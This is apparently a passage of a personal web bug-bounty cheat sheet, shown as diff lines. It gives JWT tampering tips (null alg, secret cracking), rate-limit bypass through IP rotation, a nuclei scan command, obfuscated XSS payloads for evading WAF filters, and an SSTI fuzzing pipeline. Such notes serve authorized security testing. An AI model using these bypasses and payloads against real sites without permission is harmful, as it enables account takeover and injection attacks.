    1515  -1) Access JWT Debugger too base64 decode and ensure that nothing sensitive is being transferred. Make sure no PII is being transferred etc.
    1516  - 2) Try chang esome values and obtain IDOR, like `id` or `isAdmin`
    1517  - 3) Modigy ALG attribute, set HS256 to null
    1518  - 
    1519  - 
    1520  -4) JWT Crack - - Secret used to encrypt tokens may be weak.
    1521  -```
    1522  - 
    1523  -**Rate Limiting bypass with IP Rotate**
    1524  - 
    1525  -```
    1526  -Sometimes rate limiting for authentication or OTP are based off source IP, this can be bypassed using Amazon API's and IP Rotate.
    1527  - 
    1528  -
    1529  -```
    1530  - 
    1531  -**IDOR Tricks & Bypasses**
    1532  - 
    1533  -```
    1534  -If fields are passed in clientside requests try another db Field -
    1535  - 
    1536  - 
    1537  -
    1538  - 
    1539  -```
    1540  - 
    1541  -**Nuclei**
    1542  - 
    1543  -```
    1544  -Can take numerous templates across various hosts to find known vulnerabilities.
    1545  - 
    1546  -Requires you specify a custom user agent unless Cloudfare drops all traffic.
    1547  - 
    1548  -nuclei -l newsubs.httprobe -c 60 -t /root/tools/BotTemplates/ -o newsubs.httprobe.nuclei -H "User-Agent: User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100"
    1549  -```
    1550  - 
    1551  -**Artifactory Stuff**
    1552  - 
    1553  -```
    1554  -#
    1555  - 
    1556  -```
    1557  - 
    1558  -**Cross-Site Scripting Bit n Bobs**
    1559  - 
    1560  -```
    1561  -Got a lot to add here (naturally) but for the time being just noting down this bypass.
    1562  - 
    1563  -If exploiting <a href></a> xss and "javasript" is blocked by WAF or URL then try the below.
    1564  - 
    1565  -Add any number of \n \t or \r in the middle
    1566  -java\nscript:
    1567  - 
    1568  -Add characters from \x00- \x20 at the beginning
    1569  - 
    1570  -\x01javascript:
    1571  - 
    1572  - 
    1573  -Randoomize the case
    1574  - 
    1575  -jaVAscrIpT:
    1576  - 
    1577  -Can also use the below to get rid of the word JavaScript all together
    1578  - 
    1579  -\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
    1580  - 
    1581  -\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
    1582  - 
    1583  -```
    1584  - 
    1585  -![](\&name=large)\</img>
    1586  - 
    1587  -**Quick SSTI (RCE) Tip from Twitter**
    1588  - 
    1589  -```
    1590  -#Full credit goes too -
    1591  - 
    1592  -Had to save this here as I thought it was pretty sick
    1593  - 
    1594  -root@m0chan:~ waybackurls | qsreplace "m0chan" > fuzz.txt
    1595  -root@m0chan:~ ffuf -u FUZZ -w fuzz.txt -replay-proxy
    1596  -(captured requests in burp)
    1597  -search: m0chan81 in burp
    1598  - 
    1599  -Could also apply to a few other things beside SSTI
    1600  - 
    1601  -WIP: Could also pass all QReplaced URLs to Nuclei and Grep for 81 and trigger alert?
    1602  -```
    1603  - 
    1604  -**QSReplace**
    1605  - 
    1606  -```
    1607  -I wasnt sure where to add the section on QSReplace but felt it warranted it's own section.
    1608  - 
    1609  -#
    1610  - 
    1611  -Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
    1612  - 
    1613  - 
    1614  -This can be super useful for findings things such as RXSS, LFI, SSRF , SSTI & RCE.
    1615  - 
    1616  -For example we could replace all parameters with a burp collaborator such as
    1617  - 
    1618  -root@m0chan:~ cat urls.txt | qsreplace
    1619  -
    1620  -
    1621  -
    1622  - 
    1623  -```
    1624  - 
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